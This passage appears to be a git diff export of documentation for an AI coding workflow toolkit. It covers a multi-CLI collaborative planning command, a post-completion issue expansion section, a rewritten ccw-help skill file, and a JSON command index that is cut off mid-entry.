- **Multi-CLI**: Cross-verification catches inconsistencies, builds consensus on solutions
### Value Proposition
1. **Multi-Perspective Analysis**: Gemini + Codex + Claude analyze from different angles
2. **Cross-Verification**: Identify agreements/disagreements, build confidence
3. **User-Driven Decisions**: Every round ends with user decision point
4. **Iterative Convergence**: Progressive refinement until consensus reached
### Orchestrator Boundary (CRITICAL)
- **ONLY command** for multi-CLI collaborative planning
- Manages: Session state, user decisions, agent delegation, phase transitions
- Delegates: CLI execution to @cli-discuss-agent, plan generation to @cli-lite-planning-agent
### Execution Flow
```
Phase 1: Context Gathering
└─ ACE semantic search, extract keywords, build context package
Phase 2: Multi-CLI Discussion (Iterative, via @cli-discuss-agent)
├─ Round N: Agent executes Gemini + Codex + Claude
├─ Cross-verify findings, synthesize solutions
├─ Write synthesis.json to rounds/{N}/
└─ Loop until convergence or max rounds
Phase 3: Present Options
└─ Display solutions with trade-offs from agent output
Phase 4: User Decision
├─ Approve solution → Phase 5
├─ Need clarification → Return to Phase 2
└─ Change direction → Reset with feedback
Phase 5: Plan Generation (via @cli-lite-planning-agent)
├─ Generate IMPL_PLAN.md + plan.json
└─ Hand off to /workflow:lite-execute
```
### Agent Roles
| Agent | Responsibility |
|-------|---------------|
| **Orchestrator** | Session management, ACE context, user decisions, phase transitions |
| **@cli-discuss-agent** | Multi-CLI execution (Gemini/Codex/Claude), cross-verification, solution synthesis, synthesis.json output |
| **@cli-lite-planning-agent** | Task decomposition, IMPL_PLAN.md + plan.json generation |
## Core Responsibilities
### Phase 1: Context Gathering
**Session Initialization**:
```javascript
const sessionId = `MCP-${taskSlug}-${date}`
const sessionFolder = `.workflow/.multi-cli-plan/${sessionId}`
Bash(`mkdir -p ${sessionFolder}/rounds`)
```
**ACE Context Queries**:
```javascript
const aceQueries = [
`Project architecture related to ${keywords}`,
`Existing implementations of ${keywords[0]}`,
`Code patterns for ${keywords} features`,
`Integration points for ${keywords[0]}`
]
// Execute via mcp__ace-tool__search_context
```
**Context Package** (passed to agent):
- `relevant_files[]` - Files identified by ACE
- `detected_patterns[]` - Code patterns found
- `architecture_insights` - Structure understanding
### Phase 2: Agent Delegation
**Core Principle**: Orchestrator only delegates and reads output - NO direct CLI execution.
**Agent Invocation**:
```javascript
Task({
subagent_type: "cli-discuss-agent",
run_in_background: false,
description: `Discussion round ${currentRound}`,
prompt: `
## Input Context
- task_description: ${taskDescription}
- round_number: ${currentRound}
- session: { id: "${sessionId}", folder: "${sessionFolder}" }
- ace_context: ${JSON.stringify(contextPackageage)}
- previous_rounds: ${JSON.stringify(analysisResults)}
- user_feedback: ${userFeedback || 'None'}
- cli_config: { tools: ["gemini", "codex"], mode: "parallel", fallback_chain: ["gemini", "codex", "claude"] }
## Execution Process
1. Parse input context (handle JSON strings)
2. Check if ACE supplementary search needed
3. Build CLI prompts with context
4. Execute CLIs (parallel or serial per cli_config.mode)
5. Parse CLI outputs, handle failures with fallback
6. Perform cross-verification between CLI results
7. Synthesize solutions, calculate scores
8. Calculate convergence, generate clarification questions
9. Write synthesis.json
## Output
Write: ${sessionFolder}/rounds/${currentRound}/synthesis.json
## Completion Checklist
- [ ] All configured CLI tools executed (or fallback triggered)
- [ ] Cross-verification completed with agreements/disagreements
- [ ] 2-3 solutions generated with file:line references
- [ ] Convergence score calculated (0.0-1.0)
- [ ] synthesis.json written with all Primary Fields
`
})
```
**Read Agent Output**:
```javascript
const synthesis = JSON.parse(Read(`${sessionFolder}/rounds/${round}/synthesis.json`))
// Access top-level fields: solutions, convergence, cross_verification, clarification_questions
```
**Convergence Decision**:
```javascript
if (synthesis.convergence.recommendation === 'converged') {
// Proceed to Phase 3
} else if (synthesis.convergence.recommendation === 'user_input_needed') {
// Collect user feedback, return to Phase 2
} else {
// Continue to next round if new_insights && round < maxRounds
}
```
### Phase 3: Present Options
**Display from Agent Output** (no processing):
```javascript
console.log(`
## Solution Options
${synthesis.solutions.map((s, i) => `
**Option ${i+1}: ${s.name}**
Source: ${s.source_cli.join(' + ')}
Effort: ${s.effort} | Risk: ${s.risk}
Pros: ${s.pros.join(', ')}
Cons: ${s.cons.join(', ')}
Files: ${s.affected_files.slice(0,3).map(f => `${f.file}:${f.line}`).join(', ')}
`).join('\n')}
## Cross-Verification
Agreements: ${synthesis.cross_verification.agreements.length}
Disagreements: ${synthesis.cross_verification.disagreements.length}
`)
```
### Phase 4: User Decision
**Decision Options**:
```javascript
AskUserQuestion({
questions: [{
question: "Which solution approach?",
header: "Solution",
options: solutions.map((s, i) => ({
label: `Option ${i+1}: ${s.name}`,
description: `${s.effort} effort, ${s.risk} risk`
})).concat([
{ label: "Need More Analysis", description: "Return to Phase 2" }
])
}]
})
```
**Routing**:
- Approve → Phase 5
- Need More Analysis → Phase 2 with feedback
- Add constraints → Collect details, then Phase 5
### Phase 5: Plan Generation
**Step 1: Build Context-Package** (Orchestrator responsibility):
```javascript
// Extract key information from user decision and synthesis
const contextPackage = {
// Core solution details
solution: {
name: selectedSolution.name,
source_cli: selectedSolution.source_cli,
feasibility: selectedSolution.feasibility,
effort: selectedSolution.effort,
risk: selectedSolution.risk,
summary: selectedSolution.summary
},
// Implementation plan (tasks, flow, milestones)
implementation_plan: selectedSolution.implementation_plan,
// Dependencies
dependencies: selectedSolution.dependencies || { internal: [], external: [] },
// Technical concerns
technical_concerns: selectedSolution.technical_concerns || [],
// Consensus from cross-verification
consensus: {
agreements: synthesis.cross_verification.agreements,
resolved_conflicts: synthesis.cross_verification.resolution
},
// User constraints (from Phase 4 feedback)
constraints: userConstraints || [],
// Task context
task_description: taskDescription,
session_id: sessionId
}
// Write context-package for traceability
Write(`${sessionFolder}/context-package.json`, JSON.stringify(contextPackage, null, 2))
```
**Context-Package Schema**:
| Field | Type | Description |
|-------|------|-------------|
| `solution` | object | User-selected solution from synthesis |
| `solution.name` | string | Solution identifier |
| `solution.feasibility` | number | Viability score (0-1) |
| `solution.summary` | string | Brief analysis summary |
| `implementation_plan` | object | Task breakdown with flow and dependencies |
| `implementation_plan.approach` | string | High-level technical strategy |
| `implementation_plan.tasks[]` | array | Discrete tasks with id, name, depends_on, files |
| `implementation_plan.execution_flow` | string | Task sequence (e.g., "T1 → T2 → T3") |
| `implementation_plan.milestones` | string[] | Key checkpoints |
| `dependencies` | object | Module and package dependencies |
| `technical_concerns` | string[] | Risks and blockers |
| `consensus` | object | Cross-verified agreements from multi-CLI |
| `constraints` | string[] | User-specified constraints from Phase 4 |
```json
{
"solution": {
"name": "Strategy Pattern Refactoring",
"source_cli": ["gemini", "codex"],
"feasibility": 0.88,
"effort": "medium",
"risk": "low",
"summary": "Extract payment gateway interface, implement strategy pattern for multi-gateway support"
},
"implementation_plan": {
"approach": "Define interface → Create concrete strategies → Implement factory → Migrate existing code",
"tasks": [
{"id": "T1", "name": "Define PaymentGateway interface", "depends_on": [], "files": [{"file": "src/types/payment.ts", "line": 1, "action": "create"}], "key_point": "Include all existing Stripe methods"},
{"id": "T2", "name": "Implement StripeGateway", "depends_on": ["T1"], "files": [{"file": "src/payment/stripe.ts", "line": 1, "action": "create"}], "key_point": "Wrap existing logic"},
{"id": "T3", "name": "Create GatewayFactory", "depends_on": ["T1"], "files": [{"file": "src/payment/factory.ts", "line": 1, "action": "create"}], "key_point": null},
{"id": "T4", "name": "Migrate processor to use factory", "depends_on": ["T2", "T3"], "files": [{"file": "src/payment/processor.ts", "line": 45, "action": "modify"}], "key_point": "Backward compatible"}
],
"execution_flow": "T1 → (T2 | T3) → T4",
"milestones": ["Interface defined", "Gateway implementations complete", "Migration done"]
},
"dependencies": {
"internal": ["@/lib/payment-gateway", "@/types/payment"],
"external": ["stripe@^14.0.0"]
},
"technical_concerns": ["Existing tests must pass", "No breaking API changes"],
"consensus": {
"agreements": ["Use strategy pattern", "Keep existing API"],
"resolved_conflicts": "Factory over DI for simpler integration"
},
"constraints": ["backward compatible", "no breaking changes to PaymentResult type"],
"task_description": "Refactor payment processing for multi-gateway support",
"session_id": "MCP-payment-refactor-2026-01-14"
}
```
**Step 2: Invoke Planning Agent**:
```javascript
Task({
subagent_type: "cli-lite-planning-agent",
run_in_background: false,
description: "Generate implementation plan",
prompt: `
## Schema Reference
Execute: cat ~/.claude/workflows/cli-templates/schemas/plan-json-schema.json
## Context-Package (from orchestrator)
${JSON.stringify(contextPackage, null, 2)}
## Execution Process
1. Read plan-json-schema.json for output structure
2. Read project-tech.json and project-guidelines.json
3. Parse context-package fields:
- solution: name, feasibility, summary
- implementation_plan: tasks[], execution_flow, milestones
- dependencies: internal[], external[]
- technical_concerns: risks/blockers
- consensus: agreements, resolved_conflicts
- constraints: user requirements
4. Use implementation_plan.tasks[] as task foundation
5. Preserve task dependencies (depends_on) and execution_flow
6. Expand tasks with detailed acceptance criteria
7. Generate IMPL_PLAN.md documenting milestones and key_points
8. Generate plan.json following schema exactly
## Output
- ${sessionFolder}/IMPL_PLAN.md
- ${sessionFolder}/plan.json
## Completion Checklist
- [ ] IMPL_PLAN.md documents approach, milestones, technical_concerns
- [ ] plan.json preserves task dependencies from implementation_plan
- [ ] Task execution order follows execution_flow
- [ ] Key_points reflected in task descriptions
- [ ] User constraints applied to implementation
- [ ] Acceptance criteria are testable
`
})
```
**Hand off to Execution**:
```javascript
if (userConfirms) {
SlashCommand("/workflow:lite-execute --in-memory")
}
```
## Output File Structure
```
.workflow/.multi-cli-plan/{MCP-task-slug-YYYY-MM-DD}/
├── session-state.json # Session tracking (orchestrator)
├── rounds/
│ ├── 1/synthesis.json # Round 1 analysis (cli-discuss-agent)
│ ├── 2/synthesis.json # Round 2 analysis (cli-discuss-agent)
│ └── .../
├── context-package.json # Extracted context for planning (orchestrator)
├── IMPL_PLAN.md # Documentation (cli-lite-planning-agent)
└── plan.json # Structured plan (cli-lite-planning-agent)
```
**File Producers**:
| File | Producer | Content |
|------|----------|---------|
| `session-state.json` | Orchestrator | Session metadata, rounds, decisions |
| `rounds/*/synthesis.json` | cli-discuss-agent | Solutions, convergence, cross-verification |
| `context-package.json` | Orchestrator | Extracted solution, dependencies, consensus for planning |
| `IMPL_PLAN.md` | cli-lite-planning-agent | Human-readable plan |
| `plan.json` | cli-lite-planning-agent | Structured tasks for execution |
## synthesis.json Schema
```json
{
"round": 1,
"solutions": [{
"name": "Solution Name",
"source_cli": ["gemini", "codex"],
"feasibility": 0.85,
"effort": "low|medium|high",
"risk": "low|medium|high",
"summary": "Brief analysis summary",
"implementation_plan": {
"approach": "High-level technical approach",
"tasks": [
{"id": "T1", "name": "Task", "depends_on": [], "files": [], "key_point": "..."}
],
"execution_flow": "T1 → T2 → T3",
"milestones": ["Checkpoint 1", "Checkpoint 2"]
},
"dependencies": {"internal": [], "external": []},
"technical_concerns": ["Risk 1", "Blocker 2"]
}],
"convergence": {
"score": 0.85,
"new_insights": false,
"recommendation": "converged|continue|user_input_needed"
},
"cross_verification": {
"agreements": [],
"disagreements": [],
"resolution": "..."
},
"clarification_questions": []
}
```
**Key Planning Fields**:
| Field | Purpose |
|-------|---------|
| `feasibility` | Viability score (0-1) |
| `implementation_plan.tasks[]` | Discrete tasks with dependencies |
| `implementation_plan.execution_flow` | Task sequence visualization |
| `implementation_plan.milestones` | Key checkpoints |
| `technical_concerns` | Risks and blockers |
**Note**: Solutions ranked by internal scoring (array order = priority)
## TodoWrite Structure
**Initialization**:
```javascript
TodoWrite({ todos: [
{ content: "Phase 1: Context Gathering", status: "in_progress", activeForm: "Gathering context" },
{ content: "Phase 2: Multi-CLI Discussion", status: "pending", activeForm: "Running discussion" },
{ content: "Phase 3: Present Options", status: "pending", activeForm: "Presenting options" },
{ content: "Phase 4: User Decision", status: "pending", activeForm: "Awaiting decision" },
{ content: "Phase 5: Plan Generation", status: "pending", activeForm: "Generating plan" }
]})
```
**During Discussion Rounds**:
```javascript
TodoWrite({ todos: [
{ content: "Phase 1: Context Gathering", status: "completed", activeForm: "Gathering context" },
{ content: "Phase 2: Multi-CLI Discussion", status: "in_progress", activeForm: "Running discussion" },
{ content: " → Round 1: Initial analysis", status: "completed", activeForm: "Analyzing" },
{ content: " → Round 2: Deep verification", status: "in_progress", activeForm: "Verifying" },
{ content: "Phase 3: Present Options", status: "pending", activeForm: "Presenting options" },
// ...
]})
```
## Error Handling
| Error | Resolution |
|-------|------------|
| ACE search fails | Fall back to Glob/Grep for file discovery |
| Agent fails | Retry once, then present partial results |
| CLI timeout (in agent) | Agent uses fallback: gemini → codex → claude |
| No convergence | Present best options, flag uncertainty |
| synthesis.json parse error | Request agent retry |
| User cancels | Save session for later resumption |
## Configuration
| Flag | Default | Description |
|------|---------|-------------|
| `--max-rounds` | 3 | Maximum discussion rounds |
| `--tools` | gemini,codex | CLI tools for analysis |
| `--mode` | parallel | Execution mode: parallel or serial |
| `--auto-execute` | false | Auto-execute after approval |
## Best Practices
1. **Be Specific**: Detailed task descriptions improve ACE context quality
2. **Provide Feedback**: Use clarification rounds to refine requirements
3. **Trust Cross-Verification**: Multi-CLI consensus indicates high confidence
4. **Review Trade-offs**: Consider pros/cons before selecting solution
5. **Check synthesis.json**: Review agent output for detailed analysis
6. **Iterate When Needed**: Don't hesitate to request more analysis
## Related Commands
```bash
# Resume saved session
/workflow:lite-execute --session=MCP-xxx
# Simpler single-round planning
/workflow:lite-plan "task description"
# Issue-driven discovery
/issue:discover-by-prompt "find issues"
# View session files
cat .workflow/.multi-cli-plan/{session-id}/IMPL_PLAN.md
cat .workflow/.multi-cli-plan/{session-id}/rounds/1/synthesis.json
```

View File

@@ -585,6 +585,10 @@ TodoWrite({
- Mark completed immediately after each group finishes
- Update parent phase status when all child items complete
## Post-Completion Expansion
完成后询问用户是否扩展为issue(test/enhance/refactor/doc),选中项调用 `/issue:new "{summary} - {dimension}"`
## Best Practices
1. **Trust AI Planning**: Planning agent's grouping and execution strategy are based on dependency analysis

View File

@@ -491,6 +491,10 @@ The orchestrator automatically creates git commits at key checkpoints to enable
**Note**: Final session completion creates additional commit with full summary.
## Post-Completion Expansion
完成后询问用户是否扩展为issue(test/enhance/refactor/doc),选中项调用 `/issue:new "{summary} - {dimension}"`
## Best Practices
1. **Default Settings Work**: 10 iterations sufficient for most cases

View File

@@ -1,139 +1,86 @@
---
name: ccw-help
description: Workflow command guide for Claude Code Workflow (78 commands). Search/browse commands, get next-step recommendations, view documentation, report issues. Triggers "CCW-help", "CCW-issue", "ccw-help", "ccw-issue", "ccw"
description: CCW command help system. Search, browse, recommend commands. Triggers "ccw-help", "ccw-issue".
allowed-tools: Read, Grep, Glob, AskUserQuestion
version: 6.0.0
version: 7.0.0
---
# CCW-Help Skill
CCW 命令帮助系统,提供命令搜索、推荐、文档查看和问题报告功能。
CCW 命令帮助系统,提供命令搜索、推荐、文档查看功能。
## Trigger Conditions
- 关键词: "CCW-help", "CCW-issue", "ccw-help", "ccw-issue", "帮助", "命令", "怎么用"
- 场景: 用户询问命令用法、搜索命令、请求下一步建议、报告问题
## Execution Flow
```mermaid
graph TD
A[User Query] --> B{Intent Classification}
B -->|搜索| C[Command Search]
B -->|推荐| D[Smart Recommendations]
B -->|文档| E[Documentation]
B -->|新手| F[Onboarding]
B -->|问题| G[Issue Reporting]
B -->|分析| H[Deep Analysis]
C --> I[Query Index]
D --> J[Query Relationships]
E --> K[Read Source File]
F --> L[Essential Commands]
G --> M[Generate Template]
H --> N[CLI Analysis]
I & J & K & L & M & N --> O[Synthesize Response]
```
- 关键词: "ccw-help", "ccw-issue", "帮助", "命令", "怎么用"
- 场景: 询问命令用法、搜索命令、请求下一步建议
## Operation Modes
### Mode 1: Command Search 🔍
### Mode 1: Command Search
**Triggers**: "搜索命令", "find command", "planning 相关", "search"
**Triggers**: "搜索命令", "find command", "search"
**Process**:
1. Query `index/all-commands.json` or `index/by-category.json`
2. Filter and rank results based on user context
3. Present top 3-5 relevant commands with usage hints
1. Query `command.json` commands array
2. Filter by name, description, category
3. Present top 3-5 relevant commands
### Mode 2: Smart Recommendations 🤖
### Mode 2: Smart Recommendations
**Triggers**: "下一步", "what's next", "after /workflow:plan", "推荐"
**Triggers**: "下一步", "what's next", "推荐"
**Process**:
1. Query `index/command-relationships.json`
2. Evaluate context and prioritize recommendations
3. Explain WHY each recommendation fits
1. Query command's `flow.next_steps` in `command.json`
2. Explain WHY each recommendation fits
### Mode 3: Full Documentation 📖
### Mode 3: Documentation
**Triggers**: "参数说明", "怎么用", "how to use", "详情"
**Triggers**: "怎么用", "how to use", "详情"
**Process**:
1. Locate command in index
2. Read source file via `source` path (e.g., `commands/workflow/lite-plan.md`)
3. Extract relevant sections and provide context-specific examples
1. Locate command in `command.json`
2. Read source file via `source` path
3. Provide context-specific examples
### Mode 4: Beginner Onboarding 🎓
### Mode 4: Beginner Onboarding
**Triggers**: "新手", "getting started", "如何开始", "常用命令"
**Triggers**: "新手", "getting started", "常用命令"
**Process**:
1. Query `index/essential-commands.json`
2. Assess project stage (从0到1 vs 功能新增)
3. Guide appropriate workflow entry point
1. Query `essential_commands` array
2. Guide appropriate workflow entry point
### Mode 5: Issue Reporting 📝
### Mode 5: Issue Reporting
**Triggers**: "CCW-issue", "报告 bug", "功能建议", "问题咨询"
**Triggers**: "ccw-issue", "报告 bug"
**Process**:
1. Use AskUserQuestion to gather context
2. Generate structured issue template
3. Provide actionable next steps
### Mode 6: Deep Analysis 🔬
## Data Source
**Triggers**: "详细说明", "命令原理", "agent 如何工作", "实现细节"
Single source of truth: **[command.json](command.json)**
**Process**:
1. Read source documentation directly
2. For complex queries, use CLI for multi-file analysis:
```bash
ccw cli -p "PURPOSE: Analyze command documentation..." --tool gemini --mode analysis --cd ~/.claude
```
## Index Files
CCW-Help 使用 JSON 索引实现快速查询(无 reference 文件夹,直接引用源文件):
| 文件 | 内容 | 用途 |
|------|------|------|
| `index/all-commands.json` | 完整命令目录 | 关键词搜索 |
| `index/all-agents.json` | 完整 Agent 目录 | Agent 查询 |
| `index/by-category.json` | 按类别分组 | 分类浏览 |
| `index/by-use-case.json` | 按场景分组 | 场景推荐 |
| `index/essential-commands.json` | 核心命令 | 新手引导 |
| `index/command-relationships.json` | 命令关系 | 下一步推荐 |
| Field | Purpose |
|-------|---------|
| `commands[]` | Flat command list with metadata |
| `commands[].flow` | Relationships (next_steps, prerequisites) |
| `commands[].essential` | Essential flag for onboarding |
| `agents[]` | Agent directory |
| `essential_commands[]` | Core commands list |
### Source Path Format
索引中的 `source` 字段是从 `index/` 目录的相对路径(先向上再定位
`source` 字段是相对路径(从 `skills/ccw-help/` 目录
```json
{
"name": "workflow:lite-plan",
"name": "lite-plan",
"source": "../../../commands/workflow/lite-plan.md"
}
```
路径结构: `index/` → `ccw-help/` → `skills/` → `.claude/` → `commands/...`
## Configuration
| 参数 | 默认值 | 说明 |
|------|--------|------|
| max_results | 5 | 搜索返回最大结果数 |
| show_source | true | 是否显示源文件路径 |
## CLI Integration
| 场景 | CLI Hint | 用途 |
|------|----------|------|
| 复杂查询 | `gemini --mode analysis` | 多文件分析对比 |
| 文档生成 | - | 直接读取源文件 |
## Slash Commands
```bash
@@ -145,33 +92,25 @@ CCW-Help 使用 JSON 索引实现快速查询(无 reference 文件夹,直接
## Maintenance
### 更新索引
### Update Index
```bash
cd D:/Claude_dms3/.claude/skills/ccw-help
python scripts/analyze_commands.py
```
脚本功能:
1. 扫描 `commands/` 和 `agents/` 目录
2. 提取 YAML frontmatter 元数据
3. 生成相对路径引用(无 reference 复制)
4. 重建所有索引文件
脚本功能:扫描 commands/ 和 agents/ 目录,生成统一的 command.json
## System Statistics
## Statistics
- **Commands**: 78
- **Agents**: 14
- **Categories**: 5 (workflow, cli, memory, task, general)
- **Essential**: 14 核心命令
- **Commands**: 88+
- **Agents**: 16
- **Essential**: 10 核心命令
## Core Principle
**⚠️ 智能整合,非模板复制**
**智能整合,非模板复制**
- 理解用户具体情况
- 整合多个来源信息
- 定制示例和说明
- ✅ 提供渐进式深度
- ❌ 原样复制文档
- ❌ 返回未处理的 JSON
- 理解用户具体情况
- 整合多个来源信息
- 定制示例和说明

View File

@@ -0,0 +1,511 @@
{
"_metadata": {
"version": "2.0.0",
"total_commands": 88,
"total_agents": 16,
"description": "Unified CCW-Help command index"
},
"essential_commands": [
"/workflow:lite-plan",
"/workflow:lite-fix",
"/workflow:plan",
"/workflow:execute",
"/workflow:session:start",
"/workflow:review-session-cycle",
"/memory:docs",
"/workflow:brainstorm:artifacts",
"/workflow:action-plan-verify",
"/version"
],
"commands": [
{
"name": "lite-plan",
"command": "/workflow:lite-plan",
"description": "Lightweight interactive planning with in-memory plan, dispatches to lite-execute",
"arguments": "[-e|--explore] \"task\"|file.md",
"category": "workflow",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"next_steps": ["/workflow:lite-execute"],
"alternatives": ["/workflow:plan"]
},
"source": "../../../commands/workflow/lite-plan.md"
},
{
"name": "lite-execute",
"command": "/workflow:lite-execute",
"description": "Execute based on in-memory plan or prompt",
"arguments": "[--in-memory] \"task\"|file-path",
"category": "workflow",
"difficulty": "Intermediate",
"flow": {
"prerequisites": ["/workflow:lite-plan", "/workflow:lite-fix"]
},
"source": "../../../commands/workflow/lite-execute.md"
},
{
"name": "lite-fix",
"command": "/workflow:lite-fix",
"description": "Lightweight bug diagnosis and fix with optional hotfix mode",
"arguments": "[--hotfix] \"bug description\"",
"category": "workflow",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"next_steps": ["/workflow:lite-execute"],
"alternatives": ["/workflow:lite-plan"]
},
"source": "../../../commands/workflow/lite-fix.md"
},
{
"name": "plan",
"command": "/workflow:plan",
"description": "5-phase planning with task JSON generation",
"arguments": "\"description\"|file.md",
"category": "workflow",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"next_steps": ["/workflow:action-plan-verify", "/workflow:execute"],
"alternatives": ["/workflow:tdd-plan"]
},
"source": "../../../commands/workflow/plan.md"
},
{
"name": "execute",
"command": "/workflow:execute",
"description": "Coordinate agent execution with DAG parallel processing",
"arguments": "[--resume-session=\"session-id\"]",
"category": "workflow",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"prerequisites": ["/workflow:plan", "/workflow:tdd-plan"],
"next_steps": ["/workflow:review"]
},
"source": "../../../commands/workflow/execute.md"
},
{
"name": "action-plan-verify",
"command": "/workflow:action-plan-verify",
"description": "Cross-artifact consistency analysis",
"arguments": "[--session session-id]",
"category": "workflow",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"prerequisites": ["/workflow:plan"],
"next_steps": ["/workflow:execute"]
},
"source": "../../../commands/workflow/action-plan-verify.md"
},
{
"name": "init",
"command": "/workflow:init",
"description": "Initialize project-level state",
"arguments": "[--regenerate]",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/init.md"
},
{
"name": "clean",
"command": "/workflow:clean",
"description": "Intelligent code cleanup with stale artifact discovery",
"arguments": "[--dry-run] [\"focus\"]",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/clean.md"
},
{
"name": "debug",
"command": "/workflow:debug",
"description": "Hypothesis-driven debugging with NDJSON logging",
"arguments": "\"bug description\"",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/debug.md"
},
{
"name": "replan",
"command": "/workflow:replan",
"description": "Interactive workflow replanning",
"arguments": "[--session id] [task-id] \"requirements\"",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/replan.md"
},
{
"name": "session:start",
"command": "/workflow:session:start",
"description": "Start or discover workflow sessions",
"arguments": "[--type <workflow|review|tdd>] [--auto|--new]",
"category": "workflow",
"subcategory": "session",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"next_steps": ["/workflow:plan", "/workflow:execute"]
},
"source": "../../../commands/workflow/session/start.md"
},
{
"name": "session:list",
"command": "/workflow:session:list",
"description": "List all workflow sessions",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"difficulty": "Beginner",
"source": "../../../commands/workflow/session/list.md"
},
{
"name": "session:resume",
"command": "/workflow:session:resume",
"description": "Resume paused workflow session",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/resume.md"
},
{
"name": "session:complete",
"command": "/workflow:session:complete",
"description": "Mark session complete and archive",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/complete.md"
},
{
"name": "brainstorm:auto-parallel",
"command": "/workflow:brainstorm:auto-parallel",
"description": "Parallel brainstorming with multi-role analysis",
"arguments": "\"topic\" [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/auto-parallel.md"
},
{
"name": "brainstorm:artifacts",
"command": "/workflow:brainstorm:artifacts",
"description": "Interactive clarification with guidance specification",
"arguments": "\"topic\" [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"difficulty": "Intermediate",
"essential": true,
"source": "../../../commands/workflow/brainstorm/artifacts.md"
},
{
"name": "brainstorm:synthesis",
"command": "/workflow:brainstorm:synthesis",
"description": "Refine role analyses through Q&A",
"arguments": "[--session session-id]",
"category": "workflow",
"subcategory": "brainstorm",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/synthesis.md"
},
{
"name": "tdd-plan",
"command": "/workflow:tdd-plan",
"description": "TDD planning with Red-Green-Refactor cycles",
"arguments": "\"feature\"|file.md",
"category": "workflow",
"difficulty": "Advanced",
"flow": {
"next_steps": ["/workflow:execute", "/workflow:tdd-verify"],
"alternatives": ["/workflow:plan"]
},
"source": "../../../commands/workflow/tdd-plan.md"
},
{
"name": "tdd-verify",
"command": "/workflow:tdd-verify",
"description": "Verify TDD compliance with coverage analysis",
"arguments": "[session-id]",
"category": "workflow",
"difficulty": "Advanced",
"flow": {
"prerequisites": ["/workflow:execute"]
},
"source": "../../../commands/workflow/tdd-verify.md"
},
{
"name": "review",
"command": "/workflow:review",
"description": "Post-implementation review (security/architecture/quality)",
"arguments": "[--type=<type>] [session-id]",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review.md"
},
{
"name": "review-session-cycle",
"command": "/workflow:review-session-cycle",
"description": "Multi-dimensional code review across 7 dimensions",
"arguments": "[session-id] [--dimensions=...]",
"category": "workflow",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"prerequisites": ["/workflow:execute"],
"next_steps": ["/workflow:review-fix"]
},
"source": "../../../commands/workflow/review-session-cycle.md"
},
{
"name": "review-module-cycle",
"command": "/workflow:review-module-cycle",
"description": "Module-based multi-dimensional review",
"arguments": "<path-pattern> [--dimensions=...]",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-module-cycle.md"
},
{
"name": "review-fix",
"command": "/workflow:review-fix",
"description": "Automated fixing of review findings",
"arguments": "<export-file|review-dir>",
"category": "workflow",
"difficulty": "Intermediate",
"flow": {
"prerequisites": ["/workflow:review-session-cycle", "/workflow:review-module-cycle"]
},
"source": "../../../commands/workflow/review-fix.md"
},
{
"name": "test-gen",
"command": "/workflow:test-gen",
"description": "Generate test session from implementation",
"arguments": "source-session-id",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-gen.md"
},
{
"name": "test-fix-gen",
"command": "/workflow:test-fix-gen",
"description": "Create test-fix session with strategy",
"arguments": "session-id|\"description\"|file",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-fix-gen.md"
},
{
"name": "test-cycle-execute",
"command": "/workflow:test-cycle-execute",
"description": "Execute test-fix with iterative cycles",
"arguments": "[--resume-session=id] [--max-iterations=N]",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-cycle-execute.md"
},
{
"name": "issue:new",
"command": "/issue:new",
"description": "Create issue from GitHub URL or text",
"arguments": "<url|text> [--priority 1-5]",
"category": "issue",
"difficulty": "Intermediate",
"source": "../../../commands/issue/new.md"
},
{
"name": "issue:discover",
"command": "/issue:discover",
"description": "Discover issues from multiple perspectives",
"arguments": "<path> [--perspectives=...]",
"category": "issue",
"difficulty": "Intermediate",
"source": "../../../commands/issue/discover.md"
},
{
"name": "issue:plan",
"command": "/issue:plan",
"description": "Batch plan issue resolution",
"arguments": "--all-pending|<ids>",
"category": "issue",
"difficulty": "Intermediate",
"flow": {
"next_steps": ["/issue:queue"]
},
"source": "../../../commands/issue/plan.md"
},
{
"name": "issue:queue",
"command": "/issue:queue",
"description": "Form execution queue from solutions",
"arguments": "[--rebuild]",
"category": "issue",
"difficulty": "Intermediate",
"flow": {
"prerequisites": ["/issue:plan"],
"next_steps": ["/issue:execute"]
},
"source": "../../../commands/issue/queue.md"
},
{
"name": "issue:execute",
"command": "/issue:execute",
"description": "Execute queue with DAG parallel",
"arguments": "[--worktree]",
"category": "issue",
"difficulty": "Intermediate",
"flow": {
"prerequisites": ["/issue:queue"]
},
"source": "../../../commands/issue/execute.md"
},
{
"name": "docs",
"command": "/memory:docs",
"description": "Plan documentation workflow",
"arguments": "[path] [--tool <tool>]",
"category": "memory",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"next_steps": ["/workflow:execute"]
},
"source": "../../../commands/memory/docs.md"
},
{
"name": "update-related",
"command": "/memory:update-related",
"description": "Update docs for git-changed modules",
"arguments": "[--tool <tool>]",
"category": "memory",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-related.md"
},
{
"name": "update-full",
"command": "/memory:update-full",
"description": "Update all CLAUDE.md files",
"arguments": "[--tool <tool>]",
"category": "memory",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-full.md"
},
{
"name": "skill-memory",
"command": "/memory:skill-memory",
"description": "Generate SKILL.md with loading index",
"arguments": "[path] [--regenerate]",
